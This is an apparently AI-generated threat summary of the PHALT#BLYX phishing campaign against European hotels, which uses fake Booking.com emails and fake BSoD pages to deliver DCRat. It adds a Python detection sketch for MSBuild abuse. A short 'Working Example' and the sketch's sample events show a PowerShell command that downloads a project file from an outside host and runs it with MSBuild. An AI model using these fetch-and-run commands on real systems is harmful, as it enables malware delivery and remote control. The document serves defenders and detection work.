PHALT#BLYX Campaign Targets European Hotels with DCRat Malware


These articles are AI-generated summaries. Please check the original sources for full details.

A new phishing campaign, dubbed PHALT#BLYX, is targeting European hotels with fake Booking.com emails that redirect victims to fake Blue Screen of Death (BSoD) pages and ultimately deliver the DCRat remote access trojan. The campaign was first detected in late December 2025 and uses a multi-stage attack chain.

Why This Matters

Ideal security models assume users are cautious and systems are patched, but real-world attacks exploit human error and vulnerabilities in common software. This campaign highlights the significant financial and reputational damage that can result from successful phishing attacks – a single hotel breach can expose guest data and disrupt operations, potentially costing tens of thousands of dollars in remediation and fines.

Key Insights

  • ClickFix lures: Attackers are increasingly using fake error messages (like BSoDs) to trick users into executing malicious code.
  • Living off the Land (LotL): The campaign leverages legitimate system binaries like MSBuild.exe to evade detection and establish persistence.
  • DCRat (DarkCrystal RAT): A readily available, .NET-based RAT with a plugin architecture used for data theft and remote control.

Working Example

# Example PowerShell command used in the attack (simplified)
Invoke-WebRequest -Uri "2fa-bns[.]com/v.proj" -OutFile "v.proj"
MSBuild.exe v.proj

Practical Applications

  • Use Case: Hotels are targeted due to the potential for accessing guest data (credit card numbers, personal information) and disrupting operations.
  • Pitfall: Relying solely on signature-based antivirus solutions is insufficient; behavioral analysis and endpoint detection and response (EDR) are crucial for detecting LotL techniques.
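
As an added example (not taken from the original sources or from any vendor's detection content), the Python sketch below shows the kind of behavioral check the pitfall above calls for: it scores process-creation events for MSBuild.exe started from an interactive shell and building a project file in a user-writable directory. The event field names, the parent allow-lists, the reason labels and the sample events are all assumptions constructed for illustration.

```python
import ntpath
import re

# Assumed allow-list of parents that start MSBuild in real builds; tune per site.
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}
# Shells and script hosts a pasted ClickFix command would run under (assumption).
INTERACTIVE_PARENTS = {"explorer.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
PROJECT_ARG = re.compile(r'[^\s"]+\.(?:cs|vb)?proj\b', re.I)
DOWNLOAD = re.compile(r"\b(?:invoke-webrequest|iwr|curl|wget|start-bitstransfer)\b", re.I)
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(?:appdata|downloads|desktop)\\|\\programdata\\|\\windows\\temp\\", re.I)


def score_event(ev):
    """Return the reasons a process-creation event resembles MSBuild LotL abuse."""
    reasons = []
    image = ntpath.basename(ev["image"]).lower()
    parent = ntpath.basename(ev["parent_image"]).lower()
    proj = PROJECT_ARG.search(ev["command_line"])
    if image == "msbuild.exe":
        if parent in INTERACTIVE_PARENTS:
            reasons.append("msbuild_from_interactive_parent")
        elif parent not in BUILD_PARENTS:
            reasons.append("msbuild_unusual_parent")
        # Resolve a relative project name against the working directory.
        if proj and USER_WRITABLE.search(ntpath.join(ev["cwd"], proj.group(0))):
            reasons.append("project_in_user_writable_path")
    elif image in INTERACTIVE_PARENTS and proj and DOWNLOAD.search(ev["command_line"]):
        reasons.append("shell_downloads_project_file")
    return reasons


# Constructed sample events (field names are hypothetical, not a real log schema).
TEMP = r"C:\Users\frontdesk\AppData\Local\Temp"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe", "cwd": TEMP,
     "command_line": 'powershell.exe -c "Invoke-WebRequest -Uri https://lure.example/v.proj -OutFile v.proj"'},
    {"image": MSBUILD, "parent_image": PS, "cwd": TEMP, "command_line": "MSBuild.exe v.proj"},
    {"image": MSBUILD, "parent_image": r"C:\Program Files\VS\devenv.exe", "cwd": r"C:\src\pms",
     "command_line": r"MSBuild.exe C:\src\pms\app.csproj /t:Build"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ntpath.basename(ev["image"]), score_event(ev))
```

On a hotel front-desk workstation with no development tools installed, any MSBuild.exe execution at all is worth alerting on, so the allow-list can be emptied there.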
